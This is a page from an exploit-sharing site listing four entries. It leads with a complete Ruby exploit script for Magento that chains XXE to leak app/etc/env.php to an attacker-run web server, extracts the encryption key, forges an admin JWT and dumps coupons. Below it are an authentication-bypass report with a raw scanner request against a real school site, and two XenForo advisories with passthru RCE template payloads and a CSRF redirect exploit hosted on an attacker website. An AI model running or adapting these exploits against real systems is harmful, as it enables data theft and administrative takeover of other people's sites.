Latest exploits :: CodePwn

<pre><code>#!/usr/bin/env ruby -W0 require 'bundler' Bundler.require(:default) DEBUG = false USE_PROXY = false PROXY_ADDR = '127.0.0.1' PROXY_PORT = 8080 def debug(msg) puts msg.inspect if DEBUG end def rand_text(length = 8) # random string generator o = [('a'..'z'), ('A'..'Z')].map(&:to_a).flatten (0...length).map { o[rand(o.length)] }.join end def dtd_param_name @dtd_param_name ||= rand_text() end def ent_eval @ent_eval ||= rand_text() end def leak_param_name @leak_param_name ||= rand_text() end def remote_addr @remote_addr ||= "http://#{@srv_host.host}:#{@srv_host.port}" end def http @http ||= begin http = if USE_PROXY Net::HTTP.new(@target_uri.host, @target_uri.port, PROXY_ADDR, PROXY_PORT) else Net::HTTP.new(@target_uri.host, @target_uri.port) end if @target_uri.port == 443 || @target_uri.to_s.match(%r{http(s).*}) http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_NONE end http.set_debug_output($stderr) if DEBUG http end end def make_xxe_dtd filter_path = 'php://filter/convert.base64-encode/resource=../app/etc/env.php' ent_file = rand_text() %( <!ENTITY % #{ent_file} SYSTEM "#{filter_path}"> <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM '#{remote_addr}/?#{leak_param_name}=%#{ent_file};'>"> ) end def xxe_xml_data() param_entity_name = rand_text() xml = "<?xml version='1.0' ?>" xml += "<!DOCTYPE #{rand_text()}" xml += '[' xml += " <!ELEMENT #{rand_text()} ANY >" xml += " <!ENTITY % #{param_entity_name} SYSTEM '#{remote_addr}/#{rand_text}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; " xml += ']' xml += "> <r>&#{ent_eval};</r>" xml end LIBXML_NOENT = 2 LIBXML_PARSEHUGE = 524288 def xxe_request() debug('Sending XXE request') signature = rand_text().capitalize post_data = { "address": { "#{signature}": rand_text(), "totalsCollector": { "collectorList": { "totalCollector": { "\u0073\u006F\u0075\u0072\u0063\u0065\u0044\u0061\u0074\u0061": { "data": xxe_xml_data(), "options": LIBXML_NOENT|LIBXML_PARSEHUGE } } } } } }.to_json req = Net::HTTP::Post.new('/rest/V1/guest-carts/1/estimate-shipping-methods') req.body = post_data req.content_type = 'application/json' # req.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)' res = http.request(req) raise RuntimeError, "Server returned unexpected response" unless res&.code == '400' body = JSON.parse(res.body) raise RuntimeError, "Server returned unexpected response" unless body['parameters']['fieldName'] == signature end TARGET_USER_ID = 1 USER_TYPE_INTEGRATION = 1; USER_TYPE_ADMIN = 2; USER_TYPE_CUSTOMER = 3; USER_TYPE_GUEST = 4; def jwt_encode(key, algorithm = 'HS256') def pad_key(key, total_length, pad_char) left_padding = (total_length - key.length) / 2 right_padding = total_length - key.length - left_padding pad_char * left_padding + key + pad_char * right_padding end header = { kid: "1", alg: "HS256" } payload = { uid: TARGET_USER_ID, utypid: USER_TYPE_ADMIN, iat: Time.now.to_i, # Token issue time', exp: Time.now.to_i + 10 * 24 * 60 * 60, # Token expiration time } def base64_url_encode(str) Base64.urlsafe_encode64(str).tr('=', '') end padded_key = pad_key(key, 2048, '&') encoded_header = base64_url_encode(header.to_json) encoded_payload = base64_url_encode(payload.to_json) # Create the signature data = "#{encoded_header}.#{encoded_payload}" signature = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), padded_key, data) encoded_signature = base64_url_encode(signature) # Combine the header, payload, and signature to form the JWT "#{encoded_header}.#{encoded_payload}.#{encoded_signature}" end def exploit() begin puts "Starting web server..." body = make_xxe_dtd() file_content = nil file_content_reader, file_content_writer = IO.pipe WEBrick::HTTPRequest.const_set("MAX_URI_LENGTH", 10240) wbserver_options = { :BindAddress => '0.0.0.0', :Port => @srv_host.port, :Logger => WEBrick::Log.new($stderr, WEBrick::Log::DEBUG), :AccessLog => [], # :RequestTimeout => 300, # Increase request timeout # :RequestMaxUriLength => 100240 # Increase max URI length } wbserver_options[:Logger] = WEBrick::Log.new("/dev/null") unless DEBUG pid = Process.fork do file_content_reader.close server = WEBrick::HTTPServer.new(wbserver_options) server.mount_proc '/' do |req, res| if req.path =~ /\.dtd$/ res.body = body elsif req.query_string.match(/#{leak_param_name}=(.*)/) file_content = Base64.decode64(Regexp.last_match(1)) # puts "Received leaked file content:\n#{file_content}" file_content_writer.puts file_content else res.body = 'OK' end end trap("INT") do server.shutdown file_content_writer.close end server.start end sleep(1) xxe_request() file_content_writer.close begin # Set a timeout for reading from the pipe Timeout.timeout(5) do # 5 seconds timeout, adjust as necessary file_content = file_content_reader.read_nonblock(10000) # Adjust the size as necessary end rescue Timeout::Error puts "Reading from pipe timed out." rescue EOFError puts "End of file reached." ensure file_content_reader.close end # Use file_content as needed here if file_content # puts "Successfully read file content:\n#{file_content}" key = file_content.match(/'key' => '(.*)'/)[1] if key debug "Found key: #{key}" jwt = jwt_encode(key) puts "Generated JWT: #{jwt}" puts("Sending request with JWT to coupons endpoint") # Perform authenticated request to a admin endpoint res = http.request(Net::HTTP::Get.new('/rest/default/V1/coupons/search?searchCriteria=', {'Authorization' => "Bearer #{jwt}"})) raise RuntimeError, "Server returned unexpected response" unless res&.code == '200' puts "Available coupons:" puts JSON.pretty_generate(JSON.parse(res.body)) else puts "Failed to extract key from file content." end else puts "Failed to read file content or content is empty." end puts "Exploit completed" rescue RuntimeError => e puts "#{e.class} - #{e.message}" ensure if pid Process.kill("INT", pid) Process.wait(pid) end end end if __FILE__ == $0 @target_uri = URI.parse(ARGV[0]) @srv_host = URI.parse(ARGV[1]) exploit() end </code></pre>

<pre><code>==================================================================================================================================== | # Title : Candy Redis V2.1.2 HTML Form in redirect page Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://bacadigital.com/pasti-bisa-panduan-ujian-cbt-untuk-pengguna/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Vulnerability description : An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302. Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example: <?php if (!isset($_SESSION["authenticated"])) { header("Location: auth.php"); } ?> <title>Administration page</title> <form action="/admin/action" method="post">  </form>  This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability. The correct code would be <?php if (!isset($_SESSION[auth])) { header("Location: auth.php"); exit(); } ?> <title>Administration page</title> <form action="/admin/action" method="post">  </form>  [+] infected item : /pass. [+] Attack details : Form action='' GET /pass/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass Acunetix-Aspect: enabled Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c Acunetix-Aspect-Queries: filelist;aspectalerts Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f Host: elearning7.smpn49-jkt.sch.id Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* Response HTTP/1.1 302 Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 x-powered-by: PHP/7.3.33 location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php content-type: text/html; charset=UTF-8 content-length: 16992 vary: Accept-Encoding,User-Agent date: Fri, 19 Jul 2024 10:09:49 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 platform: hostinger strict-transport-security: max-age=31536000; includeSubDomains; preload x-xss-protection: 1; mode=block x-content-type-options: nosniff Original-Content-Encoding: gzip [+] The impact of this vulnerability : depends on the affected web application. [+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>----------------------------------------------------------------------- XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability ----------------------------------------------------------------------- [-] Software Link: https://xenforo.com [-] Affected Versions: Version 2.2.15 and prior versions. [-] Vulnerability Description: XenForo implements a template system which gives complete control over the layout of XenForo pages. Through these templates, it might be possible to call certain "callback methods", however there is a sort of "sandbox" which allows to solely call read-only methods: a method is to be considered read-only when it begins with one of the allowed prefixes, such as "get" or "filter". Malicious users might be able to bypass this "sandbox" by abusing the getRepository() method from the XF\Mvc\Entity\Manager class in order to get an instance object of the XF\Util\Arr class, and from there they can abuse its filterRecursive() static method in order to execute arbitrary callbacks or functions (internally, this method calls the array_filter() PHP function with an attacker-controlled "callback" parameter). As such, this can be exploited to e.g. execute arbitrary OS commands by using a payload like the following within a template, which will try to execute the passthru() PHP function passing to it the string "whoami" as argument, potentially resulting in the execution of the "whoami" command on the web server: {{ $xf.app.em.getRepository('XF\Util\Arr').filterRecursive(['whoami'],'passthru') }} Successful exploitation of this vulnerability requires an account with permissions to administer styles or widgets. [-] Solution: Update to a fixed version or apply the vendor patches. [-] Disclosure Timeline: [22/02/2024] - Vulnerability details sent to SSD Secure Disclosure [05/06/2024] - Vendor released patches and fixed versions [14/06/2024] - CVE identifier requested [16/06/2024] - CVE identifier assigned [16/07/2024] - Coordinated public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2024-38458 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Other References: https://xenforo.com/community/threads/222133 https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/ [-] Original Advisory: http://karmainsecurity.com/KIS-2024-06 </code></pre>

<pre><code>------------------------------------------------------------------------------- XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability ------------------------------------------------------------------------------- [-] Software Link: https://xenforo.com [-] Affected Versions: Version 2.2.15 and prior versions. [-] Vulnerability Description: The XF\Admin\Controller\Widget::actionSave() method, defined into the /src/XF/Admin/Controller/Widget.php script, does not check whether the current HTTP request is a POST or a GET before saving a widget. XenForo does perform anti-CSRF checks for POST requests only, as such this method can be abused in a Cross-Site Request Forgery (CSRF) attack to create/modify arbitrary XenForo widgets via GET requests, and this can also be exploited in tandem with KIS-2024-06 to perform CSRF-based Remote Code Execution (RCE) attacks. Furthermore, XenForo implements a BB code system, as such this vulnerability could also be exploited through "Stored CSRF" attacks by abusing the [img] BB code tag, creating a thread or a private message (to be sent to the victim user) like the following: [img]https://attacker.website/exploit.php[/img] Where the exploit.php script hosted on the attacker-controlled website could be something like this: <?php $url = "https://victim.website/xenforo/"; header("Location: {$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}"); ?> Successful exploitation of this vulnerability requires a victim user with permissions to administer styles or widgets to be currently logged into the Admin Control Panel. [-] Solution: Update to a fixed version or apply the vendor patches. [-] Disclosure Timeline: [22/02/2024] - Vulnerability details sent to SSD Secure Disclosure [05/06/2024] - Vendor released patches and fixed versions [14/06/2024] - CVE identifier requested [16/06/2024] - CVE identifier assigned [16/07/2024] - Coordinated public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2024-38457 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Other References: https://xenforo.com/community/threads/222133 https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/ [-] Original Advisory: http://karmainsecurity.com/KIS-2024-05 </code></pre>